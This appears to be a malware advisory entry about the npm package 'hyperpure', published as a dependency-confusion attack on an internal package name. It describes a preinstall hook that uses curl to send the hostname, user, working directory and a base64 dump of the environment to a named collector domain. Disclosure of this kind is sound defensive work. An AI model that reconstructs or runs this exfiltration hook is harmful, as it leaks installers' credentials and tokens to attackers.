MAL-2026-6370

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (96c5552a039e4d845c30fae8f2c376eed21309d6b5298193850594fe4b1854d0) On `npm install`, the preinstall lifecycle script in package.json runs `curl` to POST the installer's hostname (`hostname -f`), current user (`whoami`), working directory (`pwd`), and a base64-encoded dump of the entire process environment (`env | base64 -w0`) over plain HTTP to `http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site`, an interactsh-style out-of-band collector domain. The dumped environment commonly includes CI tokens, cloud credentials (AWS_*, GCP, Azure), npm publish tokens, and other secrets present at install time, so any installer running `npm install hyperpure` discloses those secrets to an attacker-controlled listener. The package itself is otherwise hollow — index.js only exports `{ name: 'hyperpure', version: '1.0.0' }` — and the package metadata claims to be Zomato's internal `hyperpure` restaurant-supply-chain library, matching the shape of a dependency-confusion attack against an internal package name. The harm fires automatically on default install with no user opt-in.